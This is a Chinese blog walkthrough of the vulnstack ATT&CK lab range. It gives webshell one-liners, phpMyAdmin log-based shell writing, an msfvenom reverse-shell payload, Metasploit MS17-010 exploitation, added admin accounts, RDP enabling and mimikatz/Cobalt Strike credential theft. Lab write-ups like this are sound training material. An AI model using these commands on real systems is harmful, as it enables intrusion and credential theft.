ATTCK靶场系列(一)
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
拓扑结构大体如下:
靶机下载地址:https://pan.baidu.com/share/init?surl=nC6V8e_EuKfaLb2IuEbe7w
提取码:n1u2
开机密码:hongrisec@2019
因为要搭建一个内网环境,因此需要将虚拟机与外网隔绝,在VMware中可以通过虚拟机设置中的网络适配器来设置。
Windows7(内配有phpstudy web环境):
域内主机Win2K3 Metasploitable:
域控Windows 2008:
外网初探
web服务器win7的模拟外网ip(192.168.72.129),打开页面后发现是一个Yxcms的站点
直接上御剑先扫一波康康有没有可疑的信息~
发现有很多目录,打开发现这个cms存在目录遍历漏洞:
我们在右侧公告栏发现敏感信息泄露:后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,这样我们直接进入后台康康能不能getshell。
然后我们投机取巧谷歌大法搜一搜康康这个cms有没有漏洞,搜索后发现YXcms 1.4.7 存在任意文件写入
直接在这里写入一句话php木马 <?php @eval($_POST['cmd']); ?>
然后我们根据之前目录遍历漏洞找到flag.php
命令执行是一个管理员权限,到这里可以直接用shell连接工具就行,然后还有一个方法是通过phpMyAdmin,默认的用户名,密码:root
phpmyadmin后台getshell的几种方式:
1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell
执行以下sql语句
show variables like ‘%secure%’;
发现没有写入权限,无法用select into outfile方法直接写入shell。再来看一下第二种方法,利用开启全局日志general_log去getshell,show variables like ‘%general%’;查看日志状态
当开启general时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。
1.SET GLOBAL general_log=‘on’; 开启日志
2.set global general_log_file=‘C:/phpstudy/www/yxcms/shell.php’;# 设置日志位置为网站目录
3.将一句话木马写入shell.php文件中 SELECT ‘<?php eval($_POST["cmd"]);?>’
然后使用蚁剑连接
杀入内网
发现我们刚刚拿到的shell是一个administrator权限的shell,这样我们就不用提权什么的了
查看3389是否开启(远程桌面的服务端口)
发现3389并没有开启,我们使用以下命令开启它:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
尝试直接远程桌面连接却失败了,可能是防火墙的原因
这时候我的思路就是制作一个msf的后门上传上去运行,然后反弹一个msf的shell回来,尝试关闭防火墙
生成一个后门文件test.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=6666 -f exe -o test.exe
msf大法
msfconsole (运行msfconsole)
msf>use exploit/multi/handler (选择模块)
输入命令show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp。
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set lhost 加ip地址
set lport 加端口号
输入命令show payloads会显示出有效的攻击载荷
然后上传test.exe并运行它
成功上线
getsystem //自动尝试提权
getuid //当前会话用户身份
run post/windows/manage/enable_rdp //关闭防火墙
关闭掉防火墙后,添加用户尝试远程连接上去
添加用户 net user test asd123ASD! /add #添加一个用户net localgroup administrators test /add #将用户添加到管理员组#登陆只能选择STU1域 #STU1/
为了方便后面的内网渗透,所以上传一个CS的shell并且反弹
Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等。主要用于团队作战,可谓是团队渗透神器,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 作为一款协同APT工具,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选。使用的大致流程是:创建团队服务器->客户端连接团队服务器->创建监听器->生成payload对应监听器->靶机运行后门上线->后渗透运行cs需要先有Java环境
生成cs shell并运行
hashdump
mimitakz获取到administrator(域管理员)的明文密码
接下来我们信息收集,对域中的其他主机进行内网渗透。
Ladon 192.168.52.0/24 OnlinePC # 多协议探测存活主机(IP、机器名、MAC地址、制造商)
Ladon 192.168.52.0/24 OsScan #多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)
192.168.52.138 域控Windows 2008
192.168.52.141 域内主机Win2K3 Metasploitable
横向移动
横向渗透概念:
横向渗透攻击技术是复杂网络攻击中广泛使用的一种技术,特别是在高级持续威胁(Advanced Persistent Threats,APT)中更加热衷于使用这种攻击方法。攻击者可以利用这些技术,以被攻陷的系统为跳板,访问其他主机,获取包括邮箱、共享文件夹或者凭证信息在内的敏感资源。攻击者可以利用这些敏感信息,进一步控制其他系统、提升权限或窃取更多有价值的凭证。借助此类攻击,攻击者最终可能获取域控的访问权限,完全控制基于Windows系统的基础设施或与业务相关的关键账户。
在提权后,我们可以用mimikatz dump目标机的凭证,并进行内网横向移动
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
psexec横向移动
窃取token
在进程列表中,寻找以域管理员身份运行的进程,并选定进行steal token,如果成功,则会返回域管权限的beacon
这里窃取token 然后psexec横向移动域内主机Win2K3,ip为192.168.52.141,这是一种思路,由于失败然后我们用msf进行渗透
我们先添加一下路由
run autoroute -s 192.168.52.0/24
run autoroute -p
探测是否存在ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.141
run
存在漏洞,但是实际攻击失败了
选择下面的模块
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.52.141
set payload windows/meterpreter/bind_tcp
拿到系统权限
开启2003远程桌面
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set COMMAND REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\* \*Server /v fDenyTSConnections /t REG_DWIRD /d 00000000 /f
远程登陆Win2K3 Metasploitable成功
小白渗透不喜勿喷~
学大佬的方法 网址如下
https://www.bilibili.com/read/cv6476215/
https://www.sohu.com/a/382017102_100014967
http://www.secwk.com/2019/11/05/13705/
ATTCK靶场系列(一)相关推荐
- ATTCK靶场系列(七)
一.环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ DMZ区IP段为1 ...
- ATTCK靶场系列(五)
一.环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 虚拟机密码 win ...
- ATTCK靶场系列(六)
一.环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/8/ emmm,我得吐槽 ...
- ATTCK靶场系列(三)
一.环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 拓扑结构 百度网盘 ...
- ATTCK靶场系列(二)
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 拓扑结构大体如下: 靶机下载地址 ...
- VulnHub靶场系列:Flick
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...
- CTF靶场系列结——综合环境
文章目录 前言 一.综合环境--低难度 二.综合环境--较高难度 总结 前言 这次就是靶场系列的最后一篇了,这段时间学习这个系列的知识,感觉确实学到很多东西.现在做一下总结吧. 一.综合环境--低难度 ...
- ATTCK实战系列——红队实战(五)
ATT&CK实战系列--红队实战(五) 文章目录 ATT&CK实战系列--红队实战(五) 前言 靶场搭建 网络配置 外网渗透 内网渗透 内网信息收集 msf反弹shell 设置路由 探 ...
- 【安全练兵场】| BurpSuite靶场系列之SQL注入
文章来源|MS08067 安全练兵场 知识星球 本文作者:godunt(安全练兵场星球合伙人) 玩靶场 认准安全练兵场 成立"安全练兵场"的目的 目前,安全行业热度逐年增加,很多新 ...
最新文章
- python的源代码文件的扩展名是-python源文件后缀是什么
- 使用ueditor小结
- opencv三维重建_基于OpenCV和C++的多视图三维重建
- hdu 5172(RMQ+前缀和)
- QT的安装以及测试是否成功
- 在DataGrid中合并单元格行
- Android小項目之---ListView实现论坛管理效果(附源碼)
- linux新建两个工作组,linux添加工作组
- centos7 安装java8
- K3Cloud BOS设计 自定义添加 申请表单
- 华为 BGP路由聚合
- 基于开源的BPM流程引擎VS天翎自研BPM流程引擎
- 方程组在原点附近解matlab,前置血管常发生于A.副胎盘B.胎盘血管瘤C.双叶胎盘D.帆状胎盘...
- 整数规划(分支定界、匈牙利法)
- matlab合成和弦,基于Matlab实现音乐识别与自动配置和声的功能.pdf
- 年薪40W的程序员需要掌握怎样的技术(Java程序员高薪必看)
- 手机开机密码忘记了怎么办?
- 一维空间--离散数学图灵机文章(一)
- maven oracle 10.2.0.4.0,马文介绍说ojdbc:ojdbc14-10.2.0.4.0.jar,Maven,引入,ojdbcojdbc14102040jar...
- 自动提取word文本,并保存到excel